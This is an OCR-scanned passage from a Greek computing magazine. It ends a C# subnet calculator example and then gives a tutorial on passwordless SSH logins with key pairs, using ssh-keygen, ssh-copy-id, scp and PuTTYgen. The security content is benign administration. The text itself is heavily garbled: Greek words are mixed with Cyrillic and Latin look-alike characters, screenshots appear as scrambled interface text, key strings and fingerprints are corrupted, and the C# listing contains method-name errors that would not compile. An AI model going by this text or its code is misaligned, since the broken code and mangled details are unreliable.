11 Console.Write("IP address........: "); 

12 ip = Console.ReadLine(); 

13 Console.Write("Netmask...........: "); 

14 netmask = Console.ReadLine(); 

15 calc = new SubnettingCalcs(ip, netmask); 

16 

17 Console.WriteLine("Network capacity..: " + calc.NetCapacity. 
ToString()); 

18 Console.Writeline("Network prefix....: " + calc.Netprefix); 

19 Console.WriteLine("Broadcat address..: " + calc.Broadcast); 

20 Console.WriteLline("Hosts lowest IP...: " + calc.LowHostIp); 

21 Console.WriteLine("Hosts highest IP..: " + calc.HiHostIp); 

22 

23 Console.Write("Press any key to continue . . . "); 

24 Console.ReadKey(true); 

25 } 

26 } 

2 p 
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Όπως µπορείτε να συµπεράνετε апо τη δεύτερη γραµµή του κώδικα, ο χώρος ονο- 
μάτων που έχουμε δημιουργήσει για τη βιβλιοθήκη µας έχει το όνομα Multipetros. 
Μέσα σε αυτόν το χώρο βρίσκεται η κλάση SubnettingCalcs, éva αντικείµενο της 
οποίας δημιουργούμε στη γραμμή 09. Εναλλακτικά, για να χρησιμοποιήσουμε την 
κλάση SubnettingCalcs χωρίς va "ενσωματώσουμε' στο πρόγραμμα ολόκληρο TO 
χώρο ονομάτων, μπορούμε va γράψουµετο буора του namespace ακριβώς πριν апо 
то όνοµα της κλάσης. Έτσι, η γραμμή 09 θα γινόταν ως εξής: 


09 Multipetros.SubnettingCalcs calc; 


Projects 9 x 
En | 4) [8] 
2-5) Solution Netcalc 
Ε = Netcalc 
5- References 
ЖЕ EU 
“СЭ System 
+- System.Core 
+- System.Data 
Ὦ System Data Data SetE>xtensions 
“Сз System. Xml 
a-f Properties 
i E) Program.cs 


E Projects | Тоо» | 


Μετά την εισαγωγή της βιβλιοθήκης 
SubnettingCalcs, δημιουργήθηκε η αντίστοιχη 
εγγραφή στο δέντρο References. 


Στις επόμενες γραμμές, το πρόγραµµα 
ζητά από το χρήστη να δώσει τη διεύ- 
θυνση ΙΡ του υπολογιστή, όπως και τη 
"μάσκα δικτύου" (subnet mask). Αμέσως 
μετά, αξιοποιώντας τις μεθόδους που 
παρέχει το αντικείµενο calc της κλάσης 
SubnettingCalcs, το πρόγραμμα εμφανί- 
ζει το πλήθος των έγκυρων διευθύνσε- 
ων, τη 'μικρότερη" και τη "μεγαλύτερη" 
διεύθυνση κ.ά. Σ αυτό το σηµείο ενδέχε- 
ται να παραπονεθείτε για το γεγονός ότι 
το πρὀγραμμά µας δεν πραγματοποιεί 
κανέναν έλεγχο εγκυρότητας στα εισερ- 
χόμενα δεδομένα. Περιττό va πούμε ότι 
έχετε απόλυτο δίκιο και ότι µια τέτοια 
παράλειψη θα ήταν επιεικώς απαράδε- 
ктп για éva µεγαλύτερο και πιο 'κρίσι- 
ро" πρόγραμμα. O κὠδικας του συγκε- 
κριμένου παραδείγματος βρίσκεται oro 
http://bit.ly/dh042-dnet-netcalc και 8a 
αφήσουμε την περαιτέρω ανάπτυξή του 
στα χέρια σας. Μέχρι τον επόμενο μήνα, 
keep programming! 
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Skill: Intermediate 
Tags: OpenSSH, passwordless logins, key-based authentication, keypairs, public key cryptography 


Ασφαλή 
απομακρυσμένα 
logins, χωρίς password 


by subZraw 


To Secure Shell ñ απλά SSH εἶναι ένα πρωτόκολλο επικοινωνίας που κατοικεί 
στο Application Layer του TCP/IP stack. Μας επιτρέπει να συνδεόµαστε 
κρυπτογραφημένα σε απομακρυσμένα μηχανήματα, συνήθως για την απόκτηση 
πρόσβασης στη γραμμή εντολών. Αγαπάµε ιδιαίτερα το OpenSSH, την υλοποίηση 
Ανοικτού Λογισμικού του SSH, και θεωρούμε μάλλον απίθανο να µην το έχετε 
χρησιμοποιήσει έστω και µία φορά. 


Στο παρόν άρθρο δείχνουμε πώς οι ήδη ασφαλείς συνδέσεις SSH είναι δυνατόν να 
γίνονται ακόµα πιο ασφαλείς — και ταυτόχρονα ο χρήστης να διευκολύνεται ακόµα 
πιο πολύ. Καταλαβαίνουµε ότι αυτό που μόλις διαβάσατε αποτελεί ευθεία παραβί- 
αση της αντιστρόφως ανάλογης σχέσης μεταξύ ευκολίας και ασφάλειας, σε λίγο 
ωστόσο θα διαπιστώσετε πως ότι κερδίζουμε σε ασφάλεια και ευκολία, ro "πλη- 
ρώνουμε’ ре συνετές πρακτικές διαχείρισης. 


Πα λόγους πληρότητας, αλλά και για να τραβήξουµε την προσοχή του 4,71% των 
αναγνωστών οι οποίοι για κάποιο μυστηριώδη λόγο ακόµα δεν έχουν αρχίσει να 
χαίρονται то OpenSSH, ας σημειώσουμε ότι το πρωτόκολλο δεν λύνει τα χέρια μό- 
vov όσον αφορά στην ασφαλή πρόσβαση στις κονσόλες απομακρυσμένων hosts. 
Επιπρόσθετα, χάρη oro SSH μπορούμε va μεταφέρουμε αρχεία μεταξύ hosts µέσω 
κρυπτογραφημένων καναλιών, να στέλνουμε εντολές προς εκτέλεση σε αποµακρυ- 
σµένα συστήµατα, να ανακατευθύνουµε την ёсобо προγραμμάτων γραφικών που 
τρέχουν σε απομακρυσμένα hosts στην οθόνη του δικού µας υπολογιστή, καθώς και 
να σερφάρουµε στο web χωρίς το φόβο της παρακολούθησης апо άλλα µέλη του 
τοπικού δικτύου ή από τον ISP µας. 


Ταυτοποίηση µε password: Έχει τα µειονεκτήµατά της 


To SSH υποστηρίζει διάφορες μεθόδους για την ταυτοποίηση των χρηστῶν 
(authentication), µε την πιο συνηθισμένη να απαιτεί πληκτρολόγηση username και 
password. Έχουμε, π.χ, éva ωραιότατο VPS που τρέχει Linux κι ἔχει τον OpenSSH 
server ενεργοποιημένο, επομένως για у αποκτήσουμε πρόσβαση σε λογαριασμό 
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του συστήµατος καταφεύγουμε σ έναν SSH client κιεπιχειρούµε σύνδεση πληκτρο- 
λογώντας το κατάλληλο username, βεβαίως και το απαραίτητο password. Αν αυτά 
та username και password αντιστοιχούν πράγματι σε υπαρκτό λογαριασμό χρήστη, 
τότε η σύνδεσή µας επιτυγχάνει. Αν ὀχι, προσπαθούμε και πάλι. H ταυτοποίηση µε 
username και password αποτελεί συνηθισμένη, εύκολη και τελικά φυσιολογική δια- 
δικασία, ἐχει όμως και μερικά σοβαρά μειονεκτήματα. 


* Па κάθε λογαριασμό χρειαζόμαστε ένα ισχυρό password, διαφορετικά είναι 
πιθανό να βρεθεί апо κάποιο αυτοματοποιηµένο bruteforce script. 


* Σε κάθε λογαριασμό, σε οποιοδήποτε μηχάνημα ή/και υπηρεσία, πρέπει va 
έχουµε διαφορετικό password, διότι αν για κάποιο λόγο βρεθεί ro password 
συγκεκριμένου λογαριασμού, τότε ο επιτιθέμενος πιθανώς у αποκτήσει πρό- 
σβαση και σε άλλους λογαριασμούς µας. 


* Ακόμη κι av το password ενός λογαριασμού εἶναι ισχυρότατο, av στο µηχάνηµά 
μας εγκατασταθεί keylogger τότε το συνθηματικό θα διαρρεύσει. 


* Ένα πραγματικά καλό password έχει µεγάλο μήκος, αποτελεί συνδυασμό TE- 
бшу, κεφαλαίων, αριθμών και ειδικών συμβόλων, εἶναι τυχαίο και συνεπώς 
αδύνατο va το θυμόμαστε. Τα προηγούμενα σημαίνουν q) κόπο για την προ- 
στασία του password (θα πρέπει, π.χ. να το διατηρούμε σε κάποιον password 
manager), В) κόπο για την πληκτρολόγησή του (στην καλύτερη περίπτωση uc 
Ларе για επιλογή κι αντιγραφή από τον password manager, καθώς κι επικόλλη- 
ση στο εκάστοτε password prompt). 


* HrAnkrpoAóynon password δυσκολεύει τη λειτουργία scripts που επιθυμού- 
µε να εκτελούνται αυτόματα και, χωρίς καμία αλληλεπίδραση, να συνδέονται 
σε απομακρυσμένα hosts προκειµένου να εκτελούν συγκεκριμένες εργασίες. 
Μην πάει το μυαλό σας σε περίπλοκα σενάρια, αφού ἐτσι θα μπορούσεναλει- 
τουργεί κι éva απλό script για backup. 


Πα τους προαναφερθέντες λόγους, η ταυτοποίηση µε πληκτρολόγηση password 
καλό είναι να αποφεύγεται. Αντίθετα, πολύ προτιμότερη μέθοδος ταυτοποίησης £i- 
ναι εκείνη που απαιτεί τη χρήση κλειδιών κρυπτογράφησης. Λίγο πριν δούµε πώς 
ακριβώς δουλεύει η αντίστοιχη μέθοδος στην περίπτωση του SSH, ας επισηµάνου- 
ре τα πλεονεκτήματά της. 


* Ta bruteforce attacks παύουν να έχουν νόημα. 
* Δεν χρειάζεται να πληκτρολογούμε κάτι, προκειμένου να συνδεόµαστε. 


* Ta scripts εἶναι πλέον δυνατόν να επικοινωνούν αυτοματοποιηµένα µε αποµα- 
κρυσμένα hosts µέσω SSH, χωρίς βεβαίως να απαιτείται κάτι апо μέρους μας. 


* Σε κάθε µηχάνηµα-πελάτη δεν είναι υποχρεωτικό να έχουμε το (Oto ζεύγος 
ιδιωτικού/δηµοσίου κλειδιού (βλ. συνέχεια). 


* Ακόμη κι αν χάσουμε то laptop µας ñ κάποιος αποκτήσει φυσική πρόσβαση 
στον υπολογιστή µας, αν ἔχουμε φροντίσει να προστατεύσουµε το ιδιωτικό 
κλειδί µε μυστικό passphrase, τότε o επιτιθέμενος δεν θα μπορέσει va συνδε- 
θεί άµεσα oro απομακρυσμένο host — ὀχιπριν βρει το passphrase. Αυτό θα рас 
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δώσει αρκετό χρόνο WOTE va συνδεθούμε апо άλλο μηχάνημα (ή ακόµη κι από 
τη web console του VPS provider) και va διαγράψουμε ro δημόσιο κλειδί του 
μηχανήματος που ελέγχει ο επιτιθέμενος. Έτσι, θα rou στερήσουµε την όποια 
πιθανότητα είχε για επιτυχή σύνδεση. 


Πώς δουλεύουν τα logins χωρίς password; 


Πα κάθε πελάτη, δηλαδή για κάθε συσκευή µας από την οποία σκοπεύουµενα συνδε- 
όμαστε σε έναν απομακρυσμένο host µέσω SSH, χρειαζόμαστε ένα ζεύγος κλειδιών 
(keypair). Κάθε τέτοιο ζεύγος αποτελείται από δύο μαθηματικά συσχετισµένα κλει- 
διά: το ένα λέγεται δημόσιο κλειδί (public key) και το άλλο ιδιωτικό κλειδί (private key). 


Το ιδιωτικό κλειδί πρέπει να μένει στον client που το παρήγαγε. Είναι μάλιστα καλή 
ιδέα να προστατεύεται κι απὀ κάποια συνθηµατική φράση (passphrase) την οποία, 
περιττό να τονίσουμε, οφείλουμε να γνωρίζουμε εμείς και κανένας άλλος. Το δε 
δημόσιο κλειδί το μεταφέρουμε σε έναν ў περισσότερους λογαριασμούς αποµακρυ- 
σμένων hosts, στους οποίους επιθυμούμε va συνδεόµαστε µέσω SSH και μάλιστα 
χωρίς να πληκτρολογούμε usernames και passwords. H περίπτωση υποκλοπής του 
δημοσίου κλειδιού µας, καθόλου δεν πρέπει να µας απασχολεί. Το πολύ πολύ v' απο- 
κτήσουμε δυνατότητα σύνδεσης σε κάποιο μηχάνημα του υποκλοπέα, δηλαδή. Να 
σημειώσουμε επίσης ότι όποιος έχει ένα δημόσιο κλειδί, είναι «αδύνατονχ va napa- 
γάγει το αντίστοιχο ιδιωτικό. 


Μια σηµαντική ιδιότητα που έχουν τα κλειδιά ενός ζεύγους, εἶναι πως ότι κρυπτο- 
γραφείται µε χρήση του δημοσίου κλειδιού µπορεί va αποκρυπτογραφείται «μόνον 
με χρήση του αντίστοιχου ιδιωτικού κλειδιού (και ισχύει και το αντίστροφο). Έτσι, 
ένας host στον οποίο βρίσκεται ένα δημόσιο κλειδί µας, εἶναι σε θέση να στέλνει 
"δοκιμασίες" σε όσους επιχειρούν να συνδεθούν µέσω SSH. Ας δούμε λίγο καλύτερα 
τι συμβαίνει. 


* Kar αρχάς, προκειµένου va συνδεθούµε µε χρήση κλειδιών σε éva αποµακρυ- 
opévo host, εννοείται πως Ва έχουμε ήδη στον υπολογιστή μας ένα ζεύγος 
ιδιωτικού-δημοσίου κλειδιού. То πώς δημιουργούνται αυτά τα ζεύγη θα το 
δούµε σε λίγο. Το δημόσιο κλειδί πρέπει να εἶναι στο απομακρυσμένο host - 
και συγκεκριµένα στο αρχείο ~/.ssh/authorized_keys του λογαριασμού που µας 
ενδιαφέρει. (Το authorized_keys επιτρέπεται να περιλαμβάνει περισσότερα 
από éva δημόσια κλειδιά.) 


* Ξεκινάμε τη σύνδεση και το πρώτο πράγμα που κάνει ο client είναι να evn- 
μερώσει τον SSH server ότι επιθυμούμε key-based authentication. Επίσης, του 
λέει ποιο είναι το δημόσιο κλειδί нас. 


* O server ελέγχει για την παρουσία του δημοσίου κλειδιού στο ~/.ssh/ 
authorized. keys. Αν το βρει, παράγει éva τυχαίο string κι αµέσως το κρυπτο- 
γραφεί µε χρήση του δημοσίου κλειδιού. Προφανώς, το κρυπτογραφημένο 
αυτό μήνυμα µπορεί v' αποκρυπτογραφηθεί «μόνο µε χρήση του "σωστού" ιδι- 
ωτικού κλειδιού, το οποίο υποτίθεται ότι κατέχουµε μόνον εμείς. H πρόκληση 
апо πλευράς SSH server, λοιπόν, εἶναι va µας στείλει το κρυπτογραφημένο 
αυτό μήνυμα. 
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* Μόλις ο client λάβει το κρυπτογραφημένο μήνυμα θα το αποκρυπτογραφήσει 
µε χρήση του αντίστοιχου ιδιωτικού κλειδιού. Την αποκρυπτογραφηµένη £K- 
δοχή τη συνδυάζει µε το λεγόμενο session ID της σύνδεσης που επιχειρείται 
να εγκαθιδρυθεί. Παίρνει ἔτσι éva νέο μύνημα και υπολογίζει ro hash του, то 
οποίο στέλνει στον απομακρυσμένο SSH server. 

* Εκείνος έχει το αρχικό (µη-κρυπτογραφημένο) μήνυμα, όπως επίσης και το 
session ID. Μπορεί, λοιπόν, να υπολογίσει ro hash του cuvóuaopévou μηνύμα- 
τος και να το συγκρίνει р εκείνο που μόλις ἐλαβε апо rov client. Av τα δύο 
hashes ταυτίζονται, συμπεραίνει ότι ο πελάτης είναι ο κάτοχος του σωστού 
ιδιωτικού κλειδιού, επομένως TOU επιτρέπει την πρόσβαση. 

Н παραπάνω διαδικασία γίνεται αυτοματοποιημένα μεταξύ SSH server και SSH client, 
κι εμείς από τη μεριά µας δεν πληκτρολογούμε κάτι. То πολύ πολύ να χρειαστεί 
να δώσουμε TO passphrase του ιδιωτικού µας κλειδιού — αν προστατεύεται από 
τέτοιο. Σε κάθε περίπτωση, κατά τη διάρκεια rou authentication δεν μεταδίδονται 
ευαίσθητες πληροφορίες. Σημειώνουμε, τέλος, ότι αµέσως μετά την αποδοχή του 
client, ra δύο μηχανήματα επικοινωνούν µέσω ενός (ισχυρά) κρυπτογραφηµένου KA- 
ναλιού. 

Στις επόμενες δύο ενότητες βλέπουμε πώς παράγουµε ζεύγη κλειδιών αλλά και 
πώς συνδεόµαστε χωρίς password σε απομακρυσμένα hosts, τη µία φορά εργαζόμε- 
vot апо Unix-o&tóéq σύστημα και την άλλη εργαζόµενοι апо Windows. 


Passwordless logins από Linux, OS X, *BSD 


Κάνουμε την επἰδειξή µας ато éva laptop µε Linux Mint, υπογραμμίζουμε ωστόσο ότι 
εντελώς παρόμοιες διαδικασίες ισχύουν σε κάθε Unix-like OS. 

Πα τη δηµιουργία ενός ζεύγους κλειδιών χρησιμοποιούμε το εργαλείο ssh-keygen. 
Εξ ορισμού, το προγραμματάκι παράγει ζεύγη RSA μήκους 2048 bits και δεν έχου- 
µε λόγο να µην τα προτιµήσουμµε. Ανοίγουμε, λοιπόν, éva παράθυρο τερματικού και 
πληκτρολογούμε: 


sub0@blackbook ~ $ ssh-keygen 

Generating public/private rsa key pair. 

Enter file in which to save the key (/home/sub0/.ssh/id rsa): 
Enter passphrase (empty for no passphrase): 

Enter same passphrase again: 

Your identification has been saved in /home/sub0/.ssh/id rsa. 
Your public key has been saved in /home/sub0/.ssh/id rsa.pub. 
The key fingerprint is: 
f2:85:9c:53:94:2c:3a:fb:ed:02:b1:33:0d:27:87:85 sub0Gblackbook 
The key's randomart image is: 

*--[ RSA 2048]----* 
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sub0@blackbook ~ $ 


Τοιδιωτικό κλειδί εἶναι στο αρχείο id_rsa,uéoq στον κατάλογο ~/.ssh. To δε δημόσιο 
κλειδί είναι στο αρχείο id. rsa.pub, επίσης µέσα στον κατάλογο ~/.ssh. Παρατηρήστε 
ότι επιλέξαμε να µην προστατεύσουµε το ιδιωτικό κλειδί µε κάποιο passphrase. 
Κάτι τέτοιο εἰναι επιθυμητό όταν επιδιώκουμε την αυτόματη εκτέλεση scripts, та 
οποία συνδέονται σε απομακρυσμένα hosts µέσω SSH και χωρίς καμία αλληλεπί- 
ὅραση µε το χρήστη. 


Σηµείωση. Είπαμε πριν апо λίγο ότι για το παράδειγμά µας χρησιμοποιούμε laptop, 
οπότε τώρα ίσως σκεφτείτε ότι Τα laptops είναι σχετικά εύκολο να κλαπούν ή έστω 
να ξεχαστούν κάπου και να χαθούν. Σε µια τέτοια περίπτωση, ο νέος ιδιοκτήτης TOU 
laptop δεν 0a αργήσει να βρει To ιδιωτικό µας κλειδί — ή τουλάχιστον είναι αρκετά 
πιθανό να Το βρει. Από τη στιγµή που Το Κλειδί δεν προστατεύεται апо passphrase, 
ο επιτιθέμενος" δεν αποκλείεται να φτάσει στους server µας πριν προλάβουμε να 
συνδεθούμε και va διαγράψουµε το αντίστοιχο δημόσιο κλειδί. Κάπως έτσι έχουν Ta 
πράγματα αλλά υπάρχει και κάτι που δεν αναφέραμε, αφού δεν αποτελεί αντικείµε- 
νο του παρόντος άρθρου: Αν έχουµε φροντίσει va κρυπτογραφήσουµε το δίσκο του 
laptop, Τότε πριν φτάσει ο αντίπαλός µας στο ιδιωτικό κλειδί θα πρέπει να προσπε- 
ράσει την κρυπτογράφηση του δίσκου. Καλή του τύχη. 


Ας δούµε πως μεταφέρουμε το δημόσιο κλειδί (~/.ssh/id_rsa.pub) σε ένα αποµακρυ- 
oyévo host. Εδώ διακρίνουμε δύο περιπτώσεις. 


Περίπτωση 1: Επιτρέπεται το password-based authentication. О ευκολότερος τρό- 
πος εἶναι να καταφύγουµε στο εργαλείο ssh-copy-id. Па τη χρήση του δεν έχουµε va 
πούμε πολλά. Δείτε, π.χ. τη μεταφοράτου δημοσίου κλειδιού µας στο λογαριασμό pi 
ενός Raspberry Pi, ue FQDN (Fully Qualified Domain Name) το icepi.parabing.net: 


subOGblackbook ~ $ ssh-copy-id piQicepi.parabing.net 


The authenticity of host 'icepi.parabing.net (10.10.10.245)' can't be 
established. 


ECDSA key fingerprint is 12:64:d9:52:d1:8f:41:70:d1:20:cb:b1:1d:df:1a:48. 
Are you sure you want to continue connecting (yes/no)? yes 
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/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter 
out any that are already installed 


/usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are 
prompted now it is to install the new keys 

piGicepi.parabing.net's password: 

Number of key(s) added: 1 

Now try logging into the machine, with: "ssh 'piGicepi.parabing.net'" 
and check to make sure that only the key(s) you wanted were added. 
sub0gblackbook ~ $ 


Επειδή το πρόγραµµα δεν µπορεί να γνωρίζει ότι то ісері εἶναι rtpáypart αυτό που 
είναι (κι όχι, TUX., κάποιος rogue host σε αποστολή MITM), περιμένει από εμάς να 
επιβεβαιώσουμε τη σύνδεση. Το κάνουµε και στη συνέχεια µας ζητά να πληκτρολο- 
γήσουμε ro password του χρήστη pi, στο icepi.parabing.net. To πληκτρολογούμε και η 
µεταφορά ολοκληρώνεται επιτυχώς. Στο εξής μπορούμε να συνδεόµαστε ото ісері. 
parabing.net χωρίς να πληκτρολογούμε password. Δείτε το ακόλουθο screenshot. 


pi@icepi: ~ 
File Edit View Search Terminal Help 
sub0@blackbook 
subð@blackbook - ssh pi@icepi.parabing.net 
Linux ісері 3.18.7+ #755 PREEMPT Thu Feb 12 17:14:31 GMT 2015 armv6l 


The programs included with the Debian GNU/Linux system are free software; No password prompt! 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


at .ssh/authorized_keys 
ssh-rsa AAAAB3NzaClyc2EAAAABJQAAAgEA60sJ0Lh7g3IhsCgmEiokRWmOu+AZvrUZusfimS24BEiR9LvB+KIHcptAMDQVXiQLWETNdEsIz9016m 
9E1wYM/94MbXf z65MBD/C1HI3ZaNMNI«M6TinQnAzx9gFD1F2Xpvof26g4EboZF3K8FeEZDx8LUqr4nFL1fqP«3ERaJndNj TI6HTfmZmbQpuvVKSx5 
8CNFOdUdKU3RsgD-«QAYXeL40TNaAu76vL9cYaYqJ5R/F3gSEPdnrj 2rPHIWF2YXZOwwv--0AMBD63AGsh1WDZvyCnT4 j Gb8JCSUywifAUidl9lB3KzV 


|OEmxP2iZ«V«ENyO«WrKzCVYd4XXcpdiw8bKKMgVnvGHQCmM8820MJ --K1nmTGp5wo9Bu3MCva2uWAwNq6EZhYRwj p2UwHq03np4 r7HYa3i6*e/zN5T8 
a4Uoi*llPUGAxtEj 4jRQiX34Dj b9P«Zcr/ODqiCjNmkI8zA8bEJtmSUis2tgdcMduXtBDz JJ0fwGVxo6004QeAANPwXFVGG*ySqr7lsN60tionVOyc 
IWz64zzycXiPiFJvhwpqWXasx/CScS7GHj aqUStbYqaLHqSzSJKj3zhBf j Q6LnvzhrycdKcej iGm2AFSA6ZwvL57FikYqhrWuByneEWmyEImBEju3hi 
pZou6xxkBRalsC2dXwMkdnMaEF5zslmRTDk- rsa-key-20141028 [Generated on Core i3 PC] 


ssh-rsa AAAAB3NzaClyc2EAAAADAQABAAABAQCppUh5-*b/tov40-WGD717ynpKfdaoLwDaVmEIlQPyq7/PEj2yKTe53013Cot3PW7qQmTXI4oHteo 
JA8JFryN40175s23vZa7bFLXvPESdytfF9CxdFgQw/T8KccvJII2fQ1bM7FIpl45ReFn9LpzSRyiT/889b0p20fvOsvBwitGZllCYQetPsCm«*9zExLD 
oS5tPiNg3kBJ«TPFndpuPZN88ym2CXj 2N1Z j j 6G45kqDqf /RN06J06ulwaGpbPZpPQqXtPnvtJu0B97PY2zdZI1lIqZZq10/0PP8D8GFXdEGQ7gu-gJ 
hEsFjf4fJewgNW4Ke31IIuLQgdIDGh8gKnYV5mR subOgblackbook 

pigicepi 


Πρώτη σύνδεση SSH ото icepi.parabing.net "χωρίς" την πληκτρολόγηση password, апд ένα laptop µε 
Linux Mint (blackbook). Το δημόσιο κλειδί του χρήστη sub0 rou blackbook είναι αποθηκευμένο στο 
αρχείο ~/.ѕѕһ/аиіһогігей_Кеуѕ του χρήστη рі, στο icepi.parabing.net. Παρατηρήστε ότι στο ἰδιο αρχείο 
είναι αποθηκευμένο κι ένα άλλο δημόσιο κλειδί, από ένα άλλο μηχάνημα (µε Windows). 


Στην περίπτωση που το ssh-copy-id απουσιάζει από το σύστημά µας, μπορούμε να 
μεταφέρουμε ro id. rsa.pub µε τη βοήθεια ενός προγράµµατος σαν то scp (εκτελεί 
μεταφορές αρχείων µέσω SSH). Δείτε: 
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sub0@blackbook ~ $ scp /home/sub0/.ssh/id rsa.pub pi@icepi.parabing.net:-/ 
piGicepi.parabing.net's password: 

id rsa.pub 100% 396 0.4KB/s 00:00 

subO0Gblackbook ~ $ 


Мета тп µεταφορά, συνδεόµαστε ото ісері µέσω SSH: 


sub0@blackbook ~ $ ssh pi@icepi.parabing.net 
piGicepi.parabing.net's password: 


Αν ο κατάλογος ~/.ssh δεν υπάρχει, τον δημιουργούμε: 
pi@icepi ~ $ mkdir -/.ssh 


Φροντίζουμε wore δικαιώματα πρόσβασης να έχει μόνον ο ιδιοκτήτης, δηλαδή στην 
περἰπτωσή µας μόνον ο χρήστης pi: 


р1@1сер1 - $ chmod 700 .ssh 


Στη συνέχεια φτιάχνουμε, αν δεν υπάρχει ήδη, το αρχείο —/.ssh/authorized. keys, και 
μέσα του προσθέτουμε τα περιεχόμενα του αρχείου ~/id_pub.rsa: 


р1@1сер1 - $ touch -/.ssh/authorized_keys 
р1@1сер1 ~ $ cat id rsa.pub >> .ssh/authorized keys 


Αυτό ήταν. Στην επόμενη σύνδεση κατά SSH στο λογαριασμό pi του icepi.parabing. 
net, password δεν Ва µας ζητηθεί. 


Περίπτωση 2: Επιτρέπεται µόνο το key-based authentication. Είναι πιθανό να 
έχουµε φροντίσει από κάποιο άλλο µηχάνηµα για passwordless logins kat, επι- 
πρόσθετα, για λόγους ασφαλείας να έχουµε απενεργοποιήσει το password-based 
authentication (BA. π.χ., http://deltahacker.gr/actsubs-1srv2clouds-p23). М' άλλα 
λόγια, για τον απομακρυσμένο host που µας ενδιαφέρει ισχύει µόνο TO key-based 
authentication, αλλά апо το μηχάνημα που τώρα βρισκόμαστε εἶναι αδύνατον να το 
έχουμε; το δημόσιο κλειδί του λογαριασμού µας απουσιάζει από τον апоракроорё- 
νο λογαριασμό. 


Μοιάζει λίγο δύσκολη η κατάστασή µας, όµως στην πραγματικότητα δεν είναι. 
Πράγματι, μπορούμενα μεταφέρουμε το —/.ssh/id_rsa.pub στον υπολογιστή апо τον 
οποίο "έχουμε” πρόσβαση στο remote host, να συνδεθούµε και µετά va προσθέσου- 
µε το περιεχόµενο του id. rsa.pub στο τέλος του αρχείου ~/.ssh/authorized_keys — 
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éva απλό copy/paste είναι αρκετό! Μετά λοιπόν την ενηµέρωση rou authorized. keys, 
θα έχουµε δυνατότητα για passwordless logins *kat* апо το άλλο μηχάνημα (π.χ., то 
laptop του παραδείγματός μας). 


Passwordless logins από Windows 


To PuTTY εἰναι éva δωρεάν πρόγραμμα για Windows µε то οποίο μπορούμε να ouv- 
δεόµαστεστις γραμμές εντολών απομακρυσμένων Unix hosts. (Αν δεν το έχετε ήδη, 
κατεβάστε το τώρα апо ro http://bit.ly/getPuTTY.) Μεταξύ άλλων πρωτοκόλλων, 
το PuTTY υποστηρίζει *kar* το SSH. H γενική χρήση του προγράμματος εἰναι απλή 
και ξεφεύγει апо τους σκοπούς του παρόντος. Αξίζει όμως να δούμε πώς пара- 
γουµε ζεύγη κλειδιών, καθώς και πώς πετυχαίνουµε passwordless logins. Δείτε та 
ακόλουθα screenshots και διαβάστε τις αντίστοιχες περιγραφές. 


Φ Default Programs 

lilt) Desktop Gadget Gallery 

е Internet Explorer John Doe Actions 

€] Windows DVD Maker 
33 Windows Fax and Scan Documents ο 

indows Media Center Load an existing private key file 


indows Media Player Pictures Save the generated key 


ë Windows Update 
<А XPS Viewer Parameters 


„ Accessories Type of key to generate: 
| Games Ἣ © 55Η-1 (RSA) © SSH-2 RSA SSH-2 DSA 


Music 


; Google Chrome - Number of bits in a generated key: 2048 
Я Computer 

‚ Maintenance 

, PuTTY 
= Pageant 
EP PSFTP 
[E] PuTTY Manual 
L| PuTTY Web Site | Default Programs 
ЕЁ PuTTY 
55 PuTTYgen Help and Support 


Back 


Control Panel 


Devices and Printers 


Shutdown | 


Πα την παραγωγή ζεύγους κλειδιών δεν χρησιμοποιούμε To ίδιο TO 
PuTTY αλλά το εργαλείο PuTTYgen. Είναι To αντίστοιχο rou ssh- 
keygen, που συναντάμε στο Linux/OS X/*BSD. 
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Στο μενού Key βλέπουμε ότι 
ως είδος ζεύγους κλειδιών 
είναι προεπιλεγμένο ro SSH- 
2 RSA key. Το αφήνουμε ως 
έχει και κάνουμε κλικ στο 
Generate key pair. 


Actions 

Generate a public/private key pair 

Load an existing private key file 

Save the generated key Save public key J | Save private key ] 


Parameters 

Type of key to generate: 

Ө SSH-1 (RSA) © SSH-2 RSA © SSH-2 DSA 
Number of bits in a generated key: 


Κατά тп δημιουργία του 
ζεύγους κλειδιών µάς ο — 
ζητείται να βοηθήσουμε File Key Conversions Help 
στην παραγωγή Key 


"τυχαιότητας", κουνώντας | | 
то ποντίκι πάνω από την Please generate some randomness by moving the mouse over the blank area. 


κενή περιοχή του PuTTY Key = ш 1 


Generator. Υπακούµε μετά 
χαράς! 


Actions 
Generate a public/private key pair [ | Gene 


Load an existing private key file | Load | 
Save the generated key Save public key | [ Save private key | 


Parameters 


Type of keyto generate: 
SSH-1 (RSA) (9) SSH-2 RSA SSH-2 DSA 


Number of bits in a generated key: 2048 | 
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File Key Conversions Help 


Key 
Public key for pasting into OpenSSH authorized keys file: © 


ssh+sa 
AAAAB3NzaC1yc2EAAAABJQAAAQEAs3.tyWTyblc28LWAviwBPeGUeLEUUv4ZA3B 
anlwANhx8k4/LDFY4zIB/QXamok4MGNWZXTvzEZmpKAXHwTGBIvFaHYthCs2pl|VTx — 
BS/cT679IZ/2Gh6dnZrBuiSeAaJoZgZ6Vax0SIkIOHgGAv Kd UdmihdAkp TS 
«Q2L98AHxW20uFcP UdVlrakn/Et6G 72b 3b HOumnA4// 
Key fingerprint: ssh+sa 2048 fc:03bb:dc:09:c7:a6fe:67:¥:67b8:a1:22:da:27 
Key comment: rsa-key-20150421 
Key passphrase: 
Confirm passphrase: 


Actions 


Generate a public/private key pair ° 
Load an existing private key file JJ 


Save the generated key Save public key J | Save private key ] 


Parameters 


Type of key to generate: 2 
SSH-1 (RSA) © SSH-2 RSA SSH-2 DSA 


Number of bits in a generated key: 2048 


EP piGicepi: ~ 


Pu I enerato 
file Key Conversions Help 
Key 


Public key for pasting into OpenSSH authorized. keys file: 
g 


sehrsa 2048 fc:03bb:dc:09:c7a6fe:67:¥:67b8a1:22:da:27 
rsakey-20150421 


Generate a publc/prvate key pair [велеше | 
Load an exising private key fie [шш 
Save the generated key Savepubickey | | Save pnvate key 


Parameters 


Type of key to generate: 
SSH-1 (RSA) © SSH-2 RSA SSH-2 DSA 


Number of bits in a generated key: 2048. 


Το ζεύγος κλειδιών είναι 

έτοιμο. Xro πάνω οριζόντιο 
πλαίσιο (1) βλέπουμε το 

δημόσιο κλειδί. Αυτό ακριβώς 
θα μεταφέρουμε στο αρχείο 
~/.ssh/authorized_keys, κάθε 
λογαριασμού στον οποίο 
επιθυμούμε γα συνδεόµαστε 
χωρίς password. Προσοχή: 

Κατά την επιλογή του δημοσίου 
κλειδιού χρειάζεται προσοχή, 
ώστε να µην παραληφθεί ούτε 
